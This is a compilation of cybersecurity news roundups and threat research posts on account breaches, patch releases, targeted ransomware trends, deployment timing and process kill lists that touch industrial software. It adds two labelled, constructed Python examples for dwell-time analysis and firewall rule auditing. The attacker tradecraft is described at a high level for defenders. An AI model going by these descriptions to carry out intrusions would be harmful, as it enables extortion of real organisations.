      Nintendo confirmed 160,000 of its users' accounts had been accessed, exposing PII and Nintendo store accounts. Nintendo said that from April, its users' accounts were accessed through the Nintendo Network ID (NNID), which is primarily used for Switch gaming. The company is unaware exactly how the intrusion occurred, saying it "seems to have been made by impersonating login to Nintendo Network ID". "If you use the same password for your NNID and Nintendo account, your balance and registered credit card / PayPal may be illegally used at My Nintendo Store or Nintendo eShop. Please set different passwords for NNID and Nintendo account," Nintendo said. In response, the company has abolished users' ability to log into their Nintendo account via NNID, passwords for both NNID and Nintendo accounts are being reset, and the company is recommending multi-factor authentication be set up for each account. The account breaches weren't the only cyber issue affecting Nintendo in April: it was reported that a bot, dubbed 'Bird Bot', was used by a reseller to buy up Nintendo Switches before customers could purchase them from Nintendo. The bot benefits the reseller at the expense of consumers: by buying up all available Switches directly from Nintendo, they are able to sell them on at higher prices, making a quick and tidy profit given the current high demand for Switches and lack of supply.

      April was a busy month for security updates: Microsoft released security patches fixing 113 vulnerabilities on Patch Tuesday and an out-of-band patch for Teams for a flaw found by researchers at CyberArk. Patch Tuesday was a quiet one for Adobe, though they released fixes for 21 critical vulnerabilities in Illustrator and Bridge at the end of the month. Oracle released a huge 397 fixes for 450 CVEs in over 100 products, which I think is a new record for a patch release!

      Sophos said it and its customers were attacked when a previously unknown SQL injection vulnerability in its physical and virtual XG Firewall units was exploited. "The attack affected systems configured with either the administration interface (HTTPS admin service) or the user portal exposed on the WAN zone. In addition, firewalls manually configured to expose a firewall service (e.g. SSL VPN) to the WAN zone that shares the same port as the admin or User Portal were also affected," Sophos said.

      There were critical security patch releases for Mozilla Firefox, Chrome (twice), and for 8 Cisco products. A bunch of VMware patches were also released, including one for a CVSS 10 (highest possible) vulnerability in vCenter, a critical vulnerability in vRealize Log Insight and a critical cross-site scripting vulnerability in ESXi 6.5 and 6.7. And finally, on the patch front, Intel decided to discontinue multiple products, as it was unable to keep ahead of patching their vulnerabilities.

      Stay safe, stay home and watch out for the scams.


        Ransomware Attacks: Cybercriminals Pinpointing Healthcare Organizations


        No One is Invisible to Ransomware Attacks: Cybercriminals Pinpointing Healthcare Organizations 

        In this challenging time, cybercriminals have their eyes on consumers and institutions alike. Malicious groups have increased their targeting of hospitals and healthcare entities to take advantage of deepening resource strain. Many of these groups are using ransomware attacks to compromise hospital systems, locking up patient records or vaccine research until a hefty ransom is paid. The requested sum is usually a high value of Bitcoin or alternative cryptocurrencies, as these are typically more difficult to trace.

        However, unlike with old tax paperwork or private family photos, the impact of losing or mass distributing patient records could literally mean life or death for those awaiting urgent care or diagnosis. Bad actors count on this urgency to guarantee that their ransom is met.

        Be wary of old tactics with a new twist 

        The tactics these cybercriminals use can be a combination of traditional phishing and vulnerability exploitation. Reportedly, the WHO has seen a twofold increase in phishing attacks by cybercriminals attempting to steal credentials. Some ransomware groups have stated they will avoid targeting hospitals given the current strain on healthcare systems. Still, claims from criminal organizations should be taken with a hefty grain of salt.

        Keep your security up to date 

        In the meantime, McAfee Advanced Threat Research is closely monitoring new threats that aim to take advantage of the uncertainty surrounding the pandemic. The team has analyzed these threats based on geography, and will continue to report further findings. While these threats are not unexpected as cyber criminals always try to leverage large events to their advantage, it is disappointing to see at a time when the world needs to come together that there are those who have scant regard for the sense of community. 

        Stay ahead of malicious threats 

        Whether you're a healthcare professional, a family provider, or both, here are some tips that can help you stay ahead of malicious tactics being used to attack individuals and healthcare institutions:

        • Secure your home network by checking your device passwords and Wi-Fi password. Make sure your system and software are all up to date, and take the time to perform pending updates.  
        • Avoid clicking on emails and texts from unknown senders. Be wary of any communication coming from “official” sources that encourage urgent actions on provided links or ask for your login credentials.  
        • Check in often with family and friends and be their technical advisor if needed to help steer them away from social engineering or spammy phishing. Consider using a free safe browser extension that can help steer you away from illegitimate sites.  
        • Be sure to set up robust security on devices that may now be seeing a lot more online time.  
        • Don't forget your phone: stay protected from malicious apps and smishing/vishing attempts.

        The post Ransomware Attacks: Cybercriminals Pinpointing Healthcare Organizations appeared first on McAfee Blogs.

        Cybersecurity Trends

        Trends are interesting since they can tell you where things are going.

        I do believe in studying history and behaviours in order to figure out where things are going, so every year my colleagues from Yoroi and I spend several weeks studying and writing up what we observed during the past months in the Yoroi Cybersecurity Annual Report (freely downloadable from here: Yoroi Cybersecurity Report 2019).

        The Rise of Targeted Ransomware

        2019 was a breakthrough year in the cyber security of the European productive sector. The peculiarity of this year is not strictly related to the number of hacking attempts or to the malware code spread all over the Internet to compromise companies' assets and data, but to the evolution and consolidation of a new, highly dangerous kind of cyber attack. In 2019, we noticed a deep change in a consistent part of the global threat landscape, typically populated by state-sponsored actors, cyber-criminals and hacktivists, each having their own attributes in motivations, objectives, methods and sophistication.

        During 2019 we observed a rapid evolution of cyber crime ecosystems hosting a wide range of financially motivated actors. We observed an increased volume of money-driven attacks compared to previous years. These actors are also involved in cyber-espionage, CEO fraud, credential stealing operations, PII (Personally Identifiable Information) and IP (Intellectual Property) theft, but are traditionally much more active in so-called "opportunistic" cyber attacks: attacks opportunistically directed at the whole internet population, such as botnets and crypto-miner infection waves, but also regional operations, for instance designed to target European countries like Italy or Germany as branches of major global-scale operations, as we tracked since 2018 with the sLoad case and even earlier with the Ursnif malware propagation waves.
        In 2019, as in 2018, ransomware attacks played a significant role in the cyber arena. In previous years the whole InfoSec community observed the fast increase of the ransomware phenomenon, both in terms of newborn ransomware families and of ransom payment options, driven by the consolidation of the digital cryptocurrency market that made the traditional tracking techniques operated by law enforcement agencies less effective due to new untrackable cryptocurrencies. But these increasing volumes weren't the most worrying aspect we noticed.

        Before 2019, most ransomware attacks were conducted in an automated, mostly opportunistic fashion: for instance through drive-by download attacks and exploit kits, but also very frequently using the email vector. In fact, the "canonical" ransomware attacks before 2019 were characterized by an incoming email luring the victim to open an attachment, most of the time an Office document, carefully obfuscated to avoid detection and weaponized to launch some ransomware malware able to autonomously encrypt local user files and shared documents.

        During 2019, we monitored a deep change in this trend. Ransomware attacks became more and more sophisticated. Gradually, even major cyber-criminal botnet operators moved into this emerging sector, leveraging their infection capabilities, their long-term hacking experience and their bots to monetize their actions using new malicious business models. Indeed, almost every major malware family populating the cyber criminal landscape was involved in the delivery of follow-up ransomware within infected hosts. A typical example is the Gandcrab ransomware installation operated by Ursnif implants during most of 2019. But some criminal groups have gone further. They set the threat level to a new baseline.

        Many major cyber criminal groups developed a sort of malicious "RedTeam" units, let's call them "DarkTeams". These units are able to manually engage high value targets such as private companies or any kind of structured organization, gaining access to their core and owning the whole infrastructure at once, typically installing ransomware tools all across the network just after ensuring the deletion of the backup copies. Many times they are also using industry-specific knowledge to tamper with management networks and hypervisors to reach an impressive level of potential damage.
        Actually, this kind of behaviour is not new to us. Such methods of operation have been used for a long time, but not by such a large number of actors and not with this kind of objective. Network penetration was in fact a peculiarity of state-sponsored groups and specialized cyber criminal gangs, often threatening the banking and retail sectors, typically referenced as Advanced Persistent Threats and traditionally targeting very large enterprises and organizations.
        During 2019, we observed a strong game change in the ransomware attack panorama.

        The special "DarkTeams" replicated advanced intrusion techniques from APT playbooks, carrying them into private business sectors which were not traditionally prepared to deal with such kinds of threats. Then, they started to hit organizations with high impact business attacks modeled to be very effective for the victim context. We are facing the evolution of ransomware through the introduction of Targeted Ransomware Attacks.

        We observed and tracked many gangs consolidating the new Targeted Ransomware Attacks model. Many of them have also been cited by mainstream media and press due to the heavy impact on the business operations of prestigious companies, such as the LockerGoga and Ryuk ransomware attacks, but they were only the tip of the iceberg. Many other criminal groups have consolidated this kind of operation, such as DoppelPaymer, Nemty, REvil/Sodinokibi and Maze, definitely some of the top targeted ransomware players populating the threat landscape in the last half of 2019.
        In the past few months we also observed the emergence of a really worrisome practice by some of these players: the public shaming of their victims. Maze was one of the first actors pioneering this practice in 2019: the group started to disclose the names of the private companies they hacked into, along with pieces of internal data stolen during the network intrusions.

        The problem arises when the stolen data includes Intellectual Property and Personally Identifiable Information. In such a case the attacker leaves the victim organization in an additional, unfortunate position during the cyber-crisis: handling the data breach and the fines imposed by the Data Protection Authorities. During 2020 we expect these kinds of practices will become more and more common in criminal ecosystems. Thus, adopting a proactive approach to the Cyber Security Strategy, leveraging services like Yoroi's Cyber Security Defence Center, could be crucial to equip the Company with proper technology to acquire visibility on targeted ransomware attacks, and with the knowledge, skills and processes to spot and handle this new class of threats.

        Zero-Day Malware

        Well-known threats are always easier to recognize and manage since components and intents are very often clear. For example a ransomware, as known today, performs some standard operations such as (but not limited to): reading a file, encrypting it and writing it back. Early discovery of known threat families helps analysts perform quick and precise analyses, while unknown threats are always difficult to manage since analysts first need to discover the intentions and then map the behaviour back to standard operations. This is why we track Zero-Day Malware. Yoroi's technology captures and collects samples before processing them on Yoroi's shared threat intelligence platform, trying to attribute them to known threats.

        As part of the automatic analysis pipeline, Yoroi's technology reports whether the malicious files are potentially detected by Anti-Virus technologies at detection time. This specific analysis is mainly done to figure out if the incoming threat would be able to bypass perimeter and endpoint defences. As a positive side effect we collect data on detected threats related to their notoriety. In other words, we are able to see if a malware belonging to a threat actor or related to a specific operation (or incident) is detected by AV, firewall, Next Generation X and used endpoints.
        In this context, we shall define what we mean by Zero-Day Malware. We call Zero-Day malware every sample that turns out to be an unknown variant of an arbitrary malware family. The following image (Fig:1) shows how most of the analyzed malware is unknown to the InfoSec community and to common antivirus vendors. This finding supports the ever-evolving malware panorama in which attackers start from a shared code base but modify it depending on their need to be stealthy.


        The reported data are collected during the first propagation of the malicious files across organizations. This means companies are highly exposed to the risk of Zero-Day malware. Detection and response time play a central role in such cases, where the attack stays stealthy for hours or even days.
        Along with the Zero-Day malware observation, most of the malware known at time of delivery does not have high chances of being blocked by security controls. 8% of the malware is detected by few AV engines and only 33% is actually well identified at time of attack. Even the so-called "known malware" is still a relevant issue due to its capability to maintain a low detection rate during the first infection steps. Indeed, less than 20% of analyzed samples belonging to "not Zero-Day" are detected by more than 15 AV engines.

        Drilling down and observing the behavioural classification of the intercepted samples known by fewer than 5 antivirus engines at detection time, we can see that the "Dropper" behaviour (i.e. the downloading or unpacking of other malicious stages or components) leads the way with 54% of cases, slightly decreasing since 2018. One more interesting trend in the analyzed data is the surprising decrease of Ransomware behaviour, dropping from 17% in 2018 to the current 2%, and the bullish rise of "Trojan" behaviours up to 35% of cases, more than double the 15% of 2018.
        This trend endorses the evidence that ransomware attacks in 2019 began to follow a targeted approach, as described in the "The Rise of Targeted Ransomware" section.


        A reasonable interpretation of the shifts in these data could actually match the sophistication of the malware infection chain discussed in the previous section. As a matter of fact, much of the delivered malware is actually a single part of a more complex infection chain: a chain able to install even multiple families of malware threats, starting from simple pieces of code behaving like droppers and trojan horses to grant access to a wider range of threats.

        This trend gets another validation even in the Zero-Day malware data set: the samples likely unknown to the InfoSec community at the time of delivery substantially shifted their distribution from previous years. In particular, Ransomware behaviour detections dropped from 29% to 7% in 2019, and Trojan rose from 28% to 52% of cases, showing similar macro variations.


        If you want to read more details on “DarkTeams” and on what we observed during the past months, please feel free to download the full report HERE.

        They Come in the Night: Ransomware Deployment Trends

        Ransomware is a remote, digital shakedown. It is disruptive and expensive, and it affects all kinds of organizations, from cutting edge space technology firms, to the wool industry, to industrial environments. Infections have forced hospitals to turn away patients and law enforcement to drop cases against drug dealers. Ransomware operators have recently begun combining encryption with the threat of data leak and exposure in order to increase leverage against victims. There may be a silver lining, however; Mandiant Intelligence research suggests that focusing defensive efforts in key areas and acting quickly may allow organizations to stop ransomware before it is deployed.

        Mandiant Intelligence examined dozens of ransomware incident response investigations from 2017 to 2019. Through this research, we identified a number of common characteristics in initial intrusion vectors, dwell time, and time of day of ransomware deployment. We also noted threat actor innovations in tactics to maximize profits (Figure 1). Incidents affected organizations across North America, Europe, Asia Pacific, and the Middle East in nearly every sector category, including financial services, chemicals and materials, legal and professional services, local government, and healthcare. We observed intrusions attributed to financially motivated groups such as FIN6, TEMP.MixMaster, and dozens of additional activity sets.


        Figure 1: Themes Observed in Ransomware Incidents

        These incidents provide us with enhanced insight into ransomware trends that can be useful for network defenders, but it is worth bearing in mind that this data represents only a sample of all activity. For example, Mandiant ransomware investigations increased 860% from 2017 to 2019. The majority of these incidents appeared to be post-compromise infections, and we believe that threat actors are accelerating use of tactics including post compromise deployment to increase the likelihood of ransom payment. We also observed incidents in which ransomware was executed immediately, for example GANDCRAB and GLOBEIMPOSTER incidents, but most of the intrusions examined were longer duration and more complex post-compromise deployments.

        Common Initial Infection Vectors

        We noted several initial infection vectors across multiple ransomware incidents, including RDP, phishing with a malicious link or attachment, and drive-by download of malware facilitating follow-on activity. RDP was more frequently observed in 2017 and declined in 2018 and 2019. These vectors demonstrate that ransomware can enter victim environments by a variety of means, not all of which require user interaction.

        RDP or other remote access

        One of the most frequently observed vectors was an attacker logging on to a system in a victim environment via Remote Desktop Protocol (RDP). In some cases, the attacker brute forced the credentials (many failed authentication attempts followed by a successful one). In other cases, a successful RDP log on was the first evidence of malicious activity prior to a ransomware infection. It is possible that the targeted system used default or weak credentials, the attackers acquired valid credentials via other unobserved malicious activity, or the attackers purchased RDP access established by another threat actor. In April 2019, we noted that FIN6 used stolen credentials and RDP to move laterally in cases resulting in ransomware deployment.

        Phishing with link or attachment

        A significant number of ransomware cases were linked to phishing campaigns delivering some of the most prolific malware families in financially motivated operations: TRICKBOT, EMOTET, and FLAWEDAMMYY. In January 2019, we described TEMP.MixMaster TrickBot infections that resulted in interactive deployment of Ryuk.

        Drive-by-download

        Several ransomware infections were traced back to a user in the victim environment navigating to a compromised website that resulted in a DRIDEX infection. In October 2019, we documented compromised web infrastructure delivering FAKEUPDATES, then DRIDEX, and ultimately BITPAYMER or DOPPELPAYMER infections.

        Most Ransomware Deployments Take Place Three or More Days After Initial Infection

        The number of days elapsed between the first evidence of malicious activity and the deployment of ransomware ranged from zero to 299 days (Figure 2). That is, dwell times range quite widely, and in most cases, there was a time gap between first access and ransomware deployment. For 75 percent of incidents, at least three days passed between the first evidence of malicious activity and ransomware deployment.

        This pattern suggests that for many organizations, if initial infections are detected, contained, and remediated quickly, the significant damage and cost associated with a ransomware infection could be avoided. In fact, in a handful of cases, Mandiant incident responders and FireEye Managed Defense contained and remediated malicious activity, likely preventing ransomware deployment. Several investigations discovered evidence of ransomware installed into victim environments but not yet successfully executed.


        Figure 2: Days elapsed between initial access and ransomware deployment

        Ransomware Deployed Most Often After Hours

        In 76% of incidents we reviewed, ransomware was executed in victim environments after hours, that is, on a weekend or before 8:00 a.m. or after 6:00 p.m. on a weekday, using the time zone and customary work week of the victim organization (Figure 3 and Figure 4). This observation underscores that threat actors continue working even when most employees may not be.

        Some attackers possibly intentionally deploy ransomware after hours, on weekends, or during holidays, to maximize the potential effectiveness of the operation on the assumption that any remediation efforts will be implemented more slowly than they would be during normal work hours. In other cases, attackers linked ransomware deployment to user actions. For example, in 2019 incidents at retail and professional services firms, attackers created an Active Directory Group Policy Object to trigger ransomware execution based on user log on and log off.
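        The two observations above (dwell time between first evidence and deployment, and execution outside working hours in the victim's own time zone) are both simple computations over an incident timeline. The following is an added example (not code from the original post) that applies the post's after-hours definition to a constructed timeline; the event kinds, descriptions and the Europe/London time zone are assumptions for illustration.

```python
"""Dwell time and after-hours classification for a ransomware incident timeline.

Added example, not code from the original post. The timeline is constructed;
event kinds and descriptions are illustrative. After-hours uses the post's
definition: a weekend, or before 08:00 or after 18:00 on a weekday, in the
victim organisation's own time zone.
"""
from datetime import datetime, timezone
from zoneinfo import ZoneInfo

# Constructed timeline; timestamps are UTC, as a SIEM would normally store them.
TIMELINE = [
    ("2020-02-05T14:03:00", "first_evidence", "phishing attachment opened"),
    ("2020-02-05T14:05:00", "c2_beacon", "TRICKBOT beacon observed"),
    ("2020-02-08T21:30:00", "lateral_movement", "RDP logon to file server"),
    ("2020-02-09T03:12:00", "ransomware_executed", "Ryuk binary executed on domain controller"),
]


def to_local(ts_utc, tz_name):
    """Interpret a naive ISO-8601 UTC timestamp in the organisation's time zone."""
    return datetime.fromisoformat(ts_utc).replace(tzinfo=timezone.utc).astimezone(ZoneInfo(tz_name))


def is_after_hours(ts_utc, tz_name, start_hour=8, end_hour=18):
    """Weekend, or weekday outside [start_hour, end_hour), in local time."""
    local = to_local(ts_utc, tz_name)
    return local.weekday() >= 5 or local.hour < start_hour or local.hour >= end_hour


def dwell_days(timeline):
    """Whole days between the first evidence of malicious activity and ransomware execution."""
    times = [datetime.fromisoformat(ts) for ts, _, _ in timeline]
    deploy = min(datetime.fromisoformat(ts) for ts, kind, _ in timeline if kind == "ransomware_executed")
    return (deploy - min(times)).days


def after_hours_events(timeline, tz_name):
    """Timeline entries that fall outside the organisation's working hours."""
    return [(ts, kind) for ts, kind, _ in timeline if is_after_hours(ts, tz_name)]


if __name__ == "__main__":
    print("dwell days:", dwell_days(TIMELINE))
    for ts, kind in after_hours_events(TIMELINE, "Europe/London"):
        print("after hours:", ts, kind)
```

        Converting to the organisation's zone before classifying matters: a 17:30 UTC execution in July is 18:30 British Summer Time, which is after hours for a UK victim but would not be if the raw UTC hour were used.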


        Figure 3: Ransomware execution frequently takes place after hours


        Figure 4: Ransomware execution by hour of the day

        Mitigation Recommendations

        Organizations seeking to prevent or mitigate the effects of ransomware infections could consider the following steps. For more comprehensive recommendations for addressing ransomware, please refer to our blog post: Ransomware Protection and Containment Strategies: Practical Guidance for Endpoint Protection, Hardening, and Containment and the linked white paper.

        Address Infection Vectors

        • Use enterprise network, email, and host-based security products with up-to-date detections to prevent and detect many common malware strains such as TRICKBOT, DRIDEX, and EMOTET.
        • Contain and remediate infections quickly to prevent attackers from conducting follow-on activity or selling access to other threat actors for further exploitation.
        • Perform regular network perimeter and firewall rule audits to identify any systems that have inadvertently been left accessible to the internet. Disable RDP and other protocols to systems where this access is not expressly required. Enable multi-factor authentication where possible, particularly for internet-accessible connections (see pages 4-15 of the white paper for more details).
        • Enforce multi-factor authentication, that is, where enabled, do not allow single factor authentication for users who have not set up the multi-factor mechanism.
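        The perimeter and firewall rule audit recommended above can be scripted against a rule export. The following is an added example (not code from the original post or white paper) that flags allow rules opening remote-access ports to non-internal sources. The CSV column layout is an assumed generic format rather than any vendor's export, and the rules and addresses are constructed; the port numbers (3389 RDP, 445 SMB, 5985/5986 WinRM, 22 SSH) are the standard ones.

```python
"""Audit an exported firewall rule set for remote-access services reachable from outside.

Added example, not code from the original post. The CSV layout below is an
assumed generic export format, not any vendor's; the rules and addresses are
constructed. Ports are standard: 3389 RDP, 445 SMB, 5985/5986 WinRM, 22 SSH.
"""
import csv
import io
import ipaddress

# Constructed rule export.
RULE_EXPORT = """\
name,action,src,dst,proto,port
allow-web,allow,0.0.0.0/0,198.51.100.10,tcp,443
vendor-rdp,allow,0.0.0.0/0,198.51.100.20,tcp,3389
backup-smb,allow,10.0.0.0/8,198.51.100.30,tcp,445
ops-rdp,allow,203.0.113.0/24,198.51.100.20,tcp,3389
deny-all,deny,0.0.0.0/0,0.0.0.0/0,any,any
"""

REMOTE_ACCESS_PORTS = {3389: "RDP", 445: "SMB", 5985: "WinRM", 5986: "WinRM", 22: "SSH"}
PRIVATE_RANGES = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


def source_exposure(src):
    """Classify a source as 'any' (unrestricted), 'internal' (RFC 1918) or 'external'."""
    net = ipaddress.ip_network(src, strict=False)
    if net.prefixlen == 0:
        return "any"
    if any(p.version == net.version and net.subnet_of(p) for p in PRIVATE_RANGES):
        return "internal"
    return "external"


def audit_rules(export_text):
    """Return (rule, service, destination, exposure, severity) for allow rules that
    open a remote-access port to a non-internal source."""
    findings = []
    for row in csv.DictReader(io.StringIO(export_text)):
        if row["action"].lower() != "allow" or not row["port"].isdigit():
            continue
        service = REMOTE_ACCESS_PORTS.get(int(row["port"]))
        if service is None:
            continue
        exposure = source_exposure(row["src"])
        if exposure == "internal":
            continue
        # 'high': open to the whole internet; 'review': a specific external range,
        # so confirm it is a known partner and that MFA is enforced on it.
        severity = "high" if exposure == "any" else "review"
        findings.append((row["name"], service, row["dst"], exposure, severity))
    return findings


if __name__ == "__main__":
    for rule, service, dst, exposure, severity in audit_rules(RULE_EXPORT):
        print(f"[{severity}] {rule}: {service} to {dst} allowed from {exposure}")
```

        In the constructed export the rule named "vendor-rdp" is the kind of finding the post warns about: RDP to a host open to any source. Rules like "ops-rdp", restricted to a single external range, are not wrong by themselves but are exactly where the next bullet's MFA enforcement should be checked.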

        Implement Best Practices

        • For example, carry out regular anti-phishing training for all employees that operate a device on the company network. Ensure employees are aware of the threat, their role in preventing it, and the potential cost of a successful infection.
        • Implement network segmentation when possible to prevent a potential infection from spreading.
        • Create regular backups of critical data necessary to ensure business continuity and, if possible, store them offsite, as attackers often target backups.
        • Restrict Local Administrator accounts from specific log on types, see page 18 of the white paper for more details.
        • Use a solution such as LAPS to generate a unique Local Administrator password for each system.
        • Disallow cleartext passwords to be stored in memory in order to prevent Mimikatz credential harvesting, see p. 20 of the white paper for more details.
        • Consider cyber insurance that covers ransomware infection.

        Establish Emergency Plans

        • Ensure that after-hours coverage is available to respond within a set time period in the case of an emergency.
        • Institute after-hours emergency escalation plans that include redundant means to contact multiple stakeholders within the organization and 24-hour emergency contact information for any relevant third-party vendors.

        Outlook

        Ransomware is disruptive and costly. Threat actor innovations have only increased the potential damage of ransomware infections in recent years, and this trend shows no sign of slowing down. We expect that financially motivated actors will continue to evolve their tactics to maximize profit generated from ransomware infections. We anticipate that post-compromise ransomware infections will continue to rise and that attackers will increasingly couple ransomware deployment with other tactics, such as data theft and extortion, increasing ransom demands, and targeting critical systems.

        The good news is that particularly with post-compromise infections, there is often a window of time between the first malicious action and ransomware deployment. If network defenders can detect and remediate the initial compromise quickly, it is possible to avoid the significant damage and cost of a ransomware infection.


        Cyber Security Roundup for March 2020

        A roundup of UK focused Cyber and Information Security News, Blog Posts, Reports and general Threat Intelligence from the previous calendar month, February 2020.

        Redcar and Cleveland Borough Council became the latest UK organisation to become the victim of a mass ransomware attack, which started on 8th February. The north-east council's servers, PCs, mobile devices, websites and even phone lines had been down for three weeks at the time of writing. A Redcar and Cleveland councillor told the Guardian it would take several months to recover and that the cost of repairing the damage is expected to be between £11m and £18m, a significant sum for the cash-strapped council, which only confirmed 19 days after the attack that ransomware had caused the outage. The strain of ransomware involved and the method of initial infiltration into the council's IT systems have yet to be confirmed.


        The English FA shut down its investigation into allegations that Liverpool employees hacked into Manchester City's scouting system. The Manchester club also made news headlines after UEFA banned it from European competition for two years, a ban based on internal email evidence allegedly obtained by a hacker. Read The Billion Pound Manchester City Hack for further details.

        The UK government said GRU (Russian military intelligence) was behind a massive cyber-attack which knocked out more than 2,000 websites in the country of Georgia last year, in an "attempt to undermine Georgia's sovereignty". Foreign Secretary Dominic Raab described it as "totally unacceptable".

        The United States deputy assistant secretary for cyber and communications, Robert Strayer, said he did not believe the UK government's January 2020 decision to allow Huawei limited access to the UK's 5G infrastructure was final. "Our understanding is that there might have been some initial decisions made but conversations are continuing," he told the BBC. Read The UK Government Huawei Dilemma and the Brexit Factor for more on the UK government's Huawei political, economic and security debate.

        Following Freedom of Information requests made by Viasat, it was reported that UK government employees had 2,004 mobiles and laptops lost or stolen between June 2018 and June 2019.

        According to FBI figures, cybercriminals netted £2.7bn ($3.5bn) from cyber-crimes reported in 2019, with phishing and extortion remaining the most common methods of scamming people. FBI-reported cybercrime losses have tripled over the past five years. The FBI concluded that cyber scam techniques are becoming more sophisticated, making it harder for ordinary people to tell "real from fake". A new Kaspersky report backs up the FBI, finding 9.5% growth in financial phishing during the final quarter of 2019.

        The Labour party is facing data protection fines of up to £15m for failing to protect their members' personal data. The Information Commissioner's Office confirmed the Labour Party would be the focus of their investigation since it is legally responsible for securing members' information as the "data controller".

        This month's cloud misconfiguration breach award goes to French sports retail giant Decathlon, after 123 million customer records were found to be exposed by researchers at vpnMentor. Leaked data included employee usernames, unencrypted passwords and personally identifiable information (PII) including social security numbers, full names, addresses, mobile phone numbers and birth dates. "The leaked Decathlon Spain database contains a veritable treasure trove of employee data and more. It has everything that a malicious hacker would, in theory, need to use to take over accounts and gain access to private and even proprietary information," said vpnMentor.

        If you have a 'Ring' smart camera doorbell (IoT) device then you may have noticed Two-Factor Authentication (2FA) was mandated in February. Ring's stance of enforcing stronger security may be related to several recent high-profile home camera hack reports.
        Ring: An IoT device's security improved by mandated 2FA

        The facial recognition company Clearview AI advised that a hacker stole its client list database. The firm works with law enforcement agencies and gained notoriety after admitting it had scraped billions of individuals' photos off the internet.


        Ransomware Against the Machine: How Adversaries are Learning to Disrupt Industrial Production by Targeting IT and OT

        Since at least 2017, there has been a significant increase in public disclosures of ransomware incidents impacting industrial production and critical infrastructure organizations. Well-known ransomware families like WannaCry, LockerGoga, MegaCortex, Ryuk, Maze, and now SNAKEHOSE (a.k.a. Snake / Ekans), have cost victims across a variety of industry verticals many millions of dollars in ransom and collateral costs. These incidents have also resulted in significant disruptions and delays to the physical processes that enable organizations to produce and deliver goods and services.

        While lots of information has been shared about the victims and immediate impacts of industrial sector ransomware distribution operations, the public discourse continues to miss the big picture. As financial crime actors have evolved their tactics from opportunistic to post-compromise ransomware deployment, we have observed an increase in adversaries’ internal reconnaissance that enables them to target systems that are vital to support the chain of production. As a result, ransomware infections—either affecting critical assets in corporate networks or reaching computers in OT networks—often result in the same outcome: insufficient or late supply of end products or services.

        Truly understanding the unique nuances of industrial sector ransomware distribution operations requires a combination of skillsets and visibility across both IT and OT systems. Using examples derived from our consulting engagements and threat research, we will explain how the shift to post-compromise ransomware operations is fueling adversaries’ ability to disrupt industrial operations.

        Industrial Sector Ransomware Distribution Poses Increasing Risk as Actors Move to Post-Compromise Deployment

        The traditional approach to ransomware attacks predominantly relies on a “shotgun” methodology that consists of indiscriminate campaigns spreading malware to encrypt files and data from a variety of victims. Actors following this model will extort victims for an average of $500 to $1,000 USD and hope to receive payments from as many individuals as possible. While early ransomware campaigns adopting this approach were often considered out of scope for OT security, recent campaigns targeting entire industrial and critical infrastructure organizations have moved toward adopting a more operationally complex post-compromise approach.

        In post-compromise ransomware incidents, a threat actor may still often rely on broadly distributed malware to obtain their initial access to a victim environment, but once on a network they will focus on gaining privileged access so they can explore the target networks and identify critical systems before deploying the ransomware. This approach also makes it possible for the attacker to disable security processes that would normally be enough to detect known ransomware indicators or behaviors. Actors cast wider nets that may impact critical systems, which expand the scale and effectiveness of their end-stage operations by inflicting maximum pain on the victim. As a result, they are better positioned to negotiate and can often demand much higher ransoms—which are commonly commensurate with the victims’ perceived ability to pay and the value of the ransomed assets themselves. For more information, including technical detail, on similar activity, see our recent blog posts on FIN6 and TEMP.MixMaster.


        Figure 1: Comparison of indiscriminate vs. post-compromise ransomware approaches

        Historical incidents involving the opportunistic deployment of ransomware have often been limited to impacting individual computers, which occasionally included OT intermediary systems that were either internet-accessible, poorly segmented, or exposed to infected portable media. In 2017, we also observed campaigns such as NotPetya and BadRabbit, where wiper malware with worm-like capabilities were released to disrupt organizations while masquerading as ransomware. While these types of campaigns pose a threat to industrial production, the adoption of post-compromise deployment presents three major twists in the plot.

        • As threat actors tailor their attacks to target specific industries or organizations, companies with high-availability requirements (e.g., public utilities, hospitals, and industrial manufacturing) and perceived abilities to pay ransoms (e.g., higher revenue companies) become prime targets. This represents an expansion of financial crime actors’ targeting of industries that process directly marketable information (e.g., credit card numbers or customer data) to include the monetization of production environments.
        • As threat actors perform internal reconnaissance and move laterally across target networks before deploying ransomware, they are now better positioned to cast wide nets that impact the target’s most critical assets and negotiate from a privileged position.
        • Most importantly, many of the tactics, techniques, and procedures (TTPs) often used by financial actors in the past, resemble those employed by high-skilled actors across the initial and middle stages of the attack lifecycle of past OT security incidents. Therefore, financial crime actors are likely capable of pivoting to and deploying ransomware in OT intermediary systems to further disrupt operations.

        Organized Financial Crime Actors Have Demonstrated an Ability to Disrupt OT Assets

        An actor’s capability to obtain financial benefits from post-compromise ransomware deployment depends on many factors, one of which is the ability to disrupt systems that are the most relevant to the core mission of the victim organizations. As a result, we can expect mature actors to gradually broaden their selection from only IT and business processes, to also OT assets monitoring and controlling physical processes. This is apparent in ransomware families such as SNAKEHOSE, which was designed to execute its payload only after stopping a series of processes that included some industrial software from vendors such as General Electric and Honeywell. At first glance, the SNAKEHOSE kill list appeared to be specifically tailored to OT environments due to the relatively small number of processes (yet high number of OT-related processes) identified with automated tools for initial triage. However, after manually extracting the list from the function that was terminating the processes, we determined that the kill list utilized by SNAKEHOSE actually targets over 1,000 processes.

        In fact, we have observed very similar process kill lists deployed alongside samples from other ransomware families, including LockerGoga, MegaCortex, and Maze. Not surprisingly, all of these code families have been associated with high-profile incidents impacting industrial organizations for the past two years. The earliest kill list containing OT processes we identified was a batch script deployed alongside LockerGoga in January 2019. The list is very similar to those used later in MegaCortex incidents, albeit with notable exceptions, such as an apparent typo on an OT-related process that is not present in our SNAKEHOSE or MegaCortex samples: “proficyclient.exe4”. The absence of this typo in the SNAKEHOSE and MegaCortex samples could indicate that one of these malware authors identified and corrected the error when initially copying the OT-processes from the LockerGoga list, or that the LockerGoga author failed to properly incorporate the processes from some theoretical common source of origin, such as a dark web post.


        Figure 2: ‘proficyclient.exe’ spelling in kill lists deployed with LockerGoga (left) and SNAKEHOSE (right)

        Regardless of which ransomware family first employed the OT-related processes in a kill list or where the malware authors acquired the list, the seeming ubiquity of this list across malware families suggests that the list itself is more noteworthy than any individual malware family that has implemented it. While the OT processes identified in these lists may simply represent the coincidental output of automated process collection from target environments and not a targeted effort to impact OT, the existence of this list provides financial crime actors opportunities to disrupt OT systems. Furthermore, we expect that as financially motivated threat actors continue to impact industrial sector organizations, become more familiar with OT, and identify dependencies across IT and OT systems, they will develop capabilities—and potentially intent—to disrupt other systems and environments running industrial software products and technology.
